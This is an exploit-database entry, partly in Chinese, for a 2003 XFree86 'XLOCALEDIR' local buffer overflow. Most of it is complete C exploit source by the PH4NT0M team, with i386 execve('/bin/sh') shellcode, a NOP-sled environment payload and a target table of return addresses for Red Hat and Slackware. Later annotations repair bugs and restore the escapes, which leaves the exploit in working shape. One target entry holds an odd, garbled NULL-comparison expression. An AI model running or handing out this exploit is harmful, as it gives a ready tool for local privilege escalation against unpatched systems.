XFree86 4.2 – ‘XLOCALEDIR’ Local Buffer Overflow (4)
漏洞ID | 1053732 | 漏洞类型 | |
发布时间 | 2003-03-03 | 更新时间 | 2003-03-03 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7002/info
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered. Note that this only yields elevated privileges where the affected utility is installed setuid or setgid; on a system where it is not (as the exploit's own header remarks for Red Hat 9), the overflow runs with the invoking user's privileges and the "local root" in the exploit's name does not apply.
/* XFree86 XLOCALEDIR env local root exploit
coded by [email protected]
PH4NT0M SECURITY TEAM
bug is reported at www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4516
this bug was found by tarranta & dcryptr on 3 january 2003
dcryptr and angello have published exploits
this exploit is based on those two exploits
tested on REDHAT 9
but on that system neither binary is installed setuid (no 's' bit), so this cannot give a root shell.
just for fun!
*/
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>
#include <string.h>
#include <stdio.h>
//#define RET 0xbffffe50 // on rh9 any RETADDR in 0xbffff00---0xbffffe90 should work (author's note; the lower bound looks one hex digit short)
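/*
 * Payload copied into the PH4NT0M environment variable by main().
 * 57 bytes and free of NUL bytes, so strlen() yields its full length.
 *
 * The page this was taken from had lost every backslash, turning the
 * array into the ASCII text "x31xdb..."; the \x escapes are restored
 * here.  Read as i386 Linux code it appears to be: three int 0x80 calls
 * with ebx=0 and al=0x17, 0x17, 0x2e, then an int 0x80 with al=0x0b on
 * the pushed string "/bin//sh", then al=0x01 — i.e. the usual
 * setuid/setgid/execve/exit stub.  Verify with a disassembler before
 * relying on that reading.
 */
char shellcode[] =
    "\x31\xdb"                  /* xor  ebx, ebx          */
    "\x89\xd8"                  /* mov  eax, ebx          */
    "\xb0\x17"                  /* mov  al, 0x17          */
    "\xcd\x80"                  /* int  0x80              */
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x2e"                  /* mov  al, 0x2e          */
    "\xcd\x80"
    "\x31\xc0"                  /* xor  eax, eax          */
    "\x50"                      /* push eax               */
    "\x68\x2f\x2f\x73\x68"      /* push "//sh"            */
    "\x68\x2f\x62\x69\x6e"      /* push "/bin"            */
    "\x89\xe3"                  /* mov  ebx, esp          */
    "\x50"                      /* push eax               */
    "\x53"                      /* push ebx               */
    "\x89\xe1"                  /* mov  ecx, esp          */
    "\x31\xd2"                  /* xor  edx, edx          */
    "\xb0\x0b"                  /* mov  al, 0x0b          */
    "\xcd\x80"                  /* int  0x80              */
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x01"                  /* mov  al, 0x01          */
    "\xcd\x80";                 /* int  0x80              */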
/*
 * One row of the target table: the binary to exec and the stack layout
 * main() assumes for it.
 */
struct target {
    int num;              /* 1-based index the user passes to -t */
    char *version;        /* distribution label, display only */
    char *dest;           /* absolute path handed to execl(); NULL ends the table */
    char *name;           /* argv[0] for the program being run */
    unsigned long ret;    /* return address main() places in XLOCALEDIR */
    int bufsize;          /* length of the NOP/shellcode value put in PH4NT0M */
};
/*
 * Known targets.  main() indexes this with (num - 1); the all-zero row
 * terminates it.  The Red Hat 7.3 address was supplied by angelo rosiello
 * and the three Slackware ones by dcryptr (see the header comment).
 */
struct target exploit[] = {
    { .num = 1, .version = "Redhat linux 9.0 --", .dest = "/usr/X11R6/bin/xscreensaver" == NULL ? NULL : "/usr/X11R6/bin/xterm",
      .name = "xterm",        .ret = 0xbffffe50, .bufsize = 4076 },
    { .num = 2, .version = "Redhat linux 9.0 --", .dest = "/usr/X11R6/bin/xscreensaver",
      .name = "xscreensaver", .ret = 0xbffffe50, .bufsize = 4076 },
    { .num = 3, .version = "Redhat linux 7.3 --", .dest = "/usr/X11R6/bin/xscreensaver",
      .name = "xscreensaver", .ret = 0xbfffdf20, .bufsize = 4076 },
    { .num = 4, .version = "Slackware 8.1 --",    .dest = "/usr/X11R6/bin/xscreensaver",
      .name = "xscreensaver", .ret = 0xbfffe861, .bufsize = 6000 },
    { .num = 5, .version = "Slackware 8.1 --",    .dest = "/usr/X11R6/bin/xterm",
      .name = "xterm",        .ret = 0xbfffe86d, .bufsize = 6000 },
    { .num = 6, .version = "Slackware 8.1 --",    .dest = "/usr/X11R6/bin/xlock",
      .name = "xlock",        .ret = 0xbfffe86d, .bufsize = 6000 },
    { 0 }   /* sentinel */
};
/* Defined after main(): writes the banner and option summary to stderr. */
void usage(char *progname);
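/*
 * Entry point.  Usage: prog [-h] [-t <num>]; -t 0 lists the targets.
 *
 * Sets two environment variables and then exec()s the chosen X11 binary
 * from exploit[]:
 *   XLOCALEDIR  ENV_LEN bytes of 'A' with the target's 32-bit return
 *               address at RET_OFF — the value the utility copies without
 *               a bounds check.
 *   PH4NT0M     bufsize bytes of 0x90 with `shellcode` at SC_OFF; the
 *               return address is meant to land in that sled.
 *
 * Changes from the original: `type` is no longer read uninitialized when
 * -t is absent; the shellcode offset was `4000+i` with `i` never set; the
 * 6000-byte Slackware rows overran the original's 4076-byte stack array;
 * both env values are now NUL-terminated (the first one previously relied
 * on whatever followed the filler); stdout is flushed before exec so the
 * banner is not lost; execl() gets a real null-pointer terminator; the
 * "buf is at" line no longer passes a char(*)[] to %lx.
 *
 * Does not return when execl() succeeds.  Exits 0 on -h or a bad target
 * number, 1 after a listing or a sanity failure, -1 if execl() fails.
 */
int main(int argc, char **argv)
{
    enum {
        MAX_BUF = 6000, /* largest bufsize in exploit[]; checked at run time */
        ENV_LEN = 4072, /* length of the XLOCALEDIR value */
        RET_OFF = 2076, /* return-address offset inside it (from angelo rosiello's exploit) */
        SC_OFF  = 4000  /* shellcode offset inside the PH4NT0M value */
    };
    char buf[MAX_BUF + 1];
    int type = 0;       /* 1-based target number; 0 = none chosen yet */
    int ntargets = 0;
    int opt;

    for (ntargets = 0; exploit[ntargets].dest; ntargets++)
        ;

    while ((opt = getopt(argc, argv, "ht:")) != -1) {
        switch (opt) {
        case 'h':
            usage(argv[0]);
            exit(0);
        case 't': {
            /* strtol rather than atoi so "-t 1x" is rejected instead of read as 1 */
            char *end = NULL;
            long v = strtol(optarg, &end, 10);
            if (end == optarg || *end != '\0' || v < 0 || v > ntargets) {
                printf("Wrong Target!\n\n");
                exit(0);
            }
            type = (int)v;
            if (type == 0) {
                usage(argv[0]);
                printf("Please select target num !\n");
                printf("======================================\n");
                for (int i = 0; exploit[i].dest; i++)
                    fprintf(stderr, "[%d] | %s %s \n",
                            exploit[i].num, exploit[i].version, exploit[i].dest);
                exit(1);
            }
            break;
        }
        default:
            usage(argv[0]);
            exit(0);
        }
    }

    if (type == 0) {
        /* the original indexed exploit[] with an uninitialized `type` here */
        usage(argv[0]);
        fprintf(stderr, "no target selected: use -t <num> (-t 0 lists them)\n");
        exit(1);
    }

    const struct target *tgt = &exploit[type - 1];
    int size = tgt->bufsize;
    unsigned long ret = tgt->ret;
    size_t sc_len = strlen(shellcode);

    /* Everything below writes into buf at fixed offsets; refuse a row
     * that does not fit rather than overrun our own stack. */
    if (size <= 0 || size > MAX_BUF || SC_OFF + sc_len >= (size_t)size) {
        fprintf(stderr, "target %d: bufsize %d does not fit the payload layout\n",
                type, size);
        exit(1);
    }

    /* The address goes in as 4 little-endian bytes: it is an i386 stack
     * address, and copying sizeof(long) bytes on an LP64 host would embed
     * NUL bytes that cut the environment string short. */
    unsigned char addr[4];
    for (int i = 0; i < 4; i++)
        addr[i] = (unsigned char)((ret >> (8 * i)) & 0xff);
    if (memchr(addr, 0, sizeof addr) != NULL)
        fprintf(stderr, "warning: return address 0x%lx contains a NUL byte; "
                        "the XLOCALEDIR value will be truncated there\n", ret);

    /* First value: 'A' filler carrying the return address. */
    memset(buf, 0x41, ENV_LEN);
    memcpy(buf + RET_OFF, addr, sizeof addr);
    buf[ENV_LEN] = '\0';
    if (setenv("XLOCALEDIR", buf, 1) != 0) {
        perror("setenv XLOCALEDIR");
        exit(1);
    }

    /* Second value: NOP sled with the shellcode at SC_OFF.  buf is reused,
     * which is fine because setenv() has already copied the first value. */
    memset(buf, 0x90, (size_t)size);
    memcpy(buf + SC_OFF, shellcode, sc_len);
    buf[size] = '\0';
    if (setenv("PH4NT0M", buf, 1) != 0) {
        perror("setenv PH4NT0M");
        exit(1);
    }

    printf("\n++++++++++++++++++++++++++++++\n");
    printf("Xfree86 XLOCALEDIR env local root exploit\n");
    printf("++++++++++++++++++++++++++++++++\n\n");
    printf("coded by aXis,[email protected]");
    printf("PST,www.ph4nt0m.org\n\n");
    printf("retaddr is at 0x%lx \n", ret);
    /* The original printed its own stack buffer's address, presumably as a
     * hint of where the target's stack sits — kept, with a matching type. */
    printf("buf is at %p \n", (void *)buf);
    fflush(stdout); /* stdio buffers do not survive exec */

    execl(tgt->dest, tgt->name, (char *)NULL);
    /* execl() only returns on failure */
    fprintf(stderr, "failed,try another target! -h for help\n\n");
    exit(-1);
}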
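/*
 * Write the banner and option summary to stderr.
 *
 * c: program name shown in the usage line (argv[0]); a NULL is replaced
 *    with a placeholder rather than handed to %s.
 *
 * The page this came from had lost the backslashes of every \n and \t;
 * they are restored here so the help actually prints on separate lines.
 */
void usage(char *c)
{
    fprintf(stderr,
            "\n===XFree86 XLOCALEDIR env local root exploit====\n"
            "====coded by aXis===========\n"
            "[email protected]"
            "===PH4NT0M SECURITY TEAM www.ph4nt0m.org===\n\n"
            "usage: %s [-h] [-t <num>]\n"
            "Options:\n"
            " -h:\t this help.\n"
            " -t num:\t select the target type,try 0 for list\n\n",
            c ? c : "exploit");
}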